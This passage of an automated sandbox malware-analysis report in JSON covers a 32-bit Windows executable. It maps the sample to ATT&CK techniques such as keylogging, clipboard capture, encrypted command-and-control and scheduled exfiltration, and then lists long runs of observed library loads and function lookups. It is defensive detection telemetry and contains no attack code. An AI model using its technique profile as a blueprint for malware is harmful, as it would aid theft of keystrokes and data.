"informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,add\tesp, -0x10,mov\teax, 0x46c418,call\t0x405cf0,mov\teax, dword ptr [0x46e120],mov\teax, dword ptr [eax],call\t0x45ce8c,mov\tecx, dword ptr [0x46e038],mov\teax, dword ptr [0x46e120],mov\teax, dword ptr [eax],mov\tedx, dword ptr [0x46ac3c],call\t0x45cea4,mov\tecx, dword ptr [0x46e074],mov\teax, dword ptr [0x46e120],mov\teax, dword ptr [eax],mov\tedx, dword ptr [0x46b970],call\t0x45cea4,mov\tecx, dword ptr [0x46e240],mov\teax, dword ptr [0x46e120],mov\teax, dword ptr [eax],mov\tedx, dword ptr [0x46a9c8],call\t0x45cea4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03eff69@advapi32.dll\"\n \"0e000f00703fff69@advapi32.dll\"\n \"0e000f00cc3fff69@advapi32.dll\"\n \"11001200b447ff69@advapi32.dll\"\n \"110012004848ff69@advapi32.dll\"\n \"120013008c48ff69@advapi32.dll\"\n \"12001300e448ff69@advapi32.dll\"\n \"14001500386eff69@advapi32.dll\"\n \"14001500506eff69@advapi32.dll\"\n \"14001500686eff69@advapi32.dll\"\n \"17001800806eff69@advapi32.dll\"\n \"0d000e00986eff69@advapi32.dll\"\n \"11001200a86eff69@advapi32.dll\"\n \"11001200bc6eff69@advapi32.dll\"\n \"0d000e003449ff69@shell32.dll\"\n \"0d000e00b049ff69@shell32.dll\"\n \"0f001000fc6fff69@advapi32.dll\"\n \"140015003c70ff69@advapi32.dll\"\n \"140015005470ff69@advapi32.dll\"\n \"0c000d009c70ff69@advapi32.dll\"\n \"0c000d00ac70ff69@advapi32.dll\"\n \"0e000f00bc70ff69@advapi32.dll\"\n \"0e000f00cc70ff69@advapi32.dll\"\n \"0b000c00dc70ff69@advapi32.dll\"\n \"180019001473ff69@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"KERNEL32\" at base 75430000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"ADVAPI32.DLL\" at base 76dc0000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"UXTHEME.DLL\" at base 739f0000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"KERNEL32.DLL\" at base 75430000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"COMCTL32\" at base 73e60000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 76f00000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"CRYPTBASE.DLL\" at base 74e60000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"CLBCATQ.DLL\" at base 76e70000\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 76cf0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter OpenThemeData (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CloseThemeData (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DrawThemeBackground (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DrawThemeText (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundContentRect (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemePartSize (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeTextExtent (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeTextMetrics (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeBackgroundRegion (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter HitTestThemeBackground (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DrawThemeEdge (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DrawThemeIcon (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter IsThemePartDefined (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter IsThemeBackgroundPartiallyTransparent (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeColor (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeMetric (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeString (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeBool (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeInt (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeEnumValue (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemePosition (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeFont (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeRect (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeMargins (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeIntList (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemePropertyOrigin (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SetWindowTheme (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeFilename (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeSysColor (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeSysColorBrush (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeSysBool (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeSysSize (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeSysFont (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeSysString (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeSysInt (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter IsThemeActive (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetWindowTheme (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter EnableThemeDialogTexture (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter IsThemeDialogTextureEnabled (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeAppProperties (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SetThemeAppProperties (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetCurrentThemeName (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetThemeDocumentationProperty (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DrawThemeParentBackground (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter EnableTheming (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter HIMAGELIST_QueryInterface (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DrawShadowText (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DrawSizeBox (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DrawScrollBar (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter SizeBoxHwnd (UID: 00000000-00005520)\n 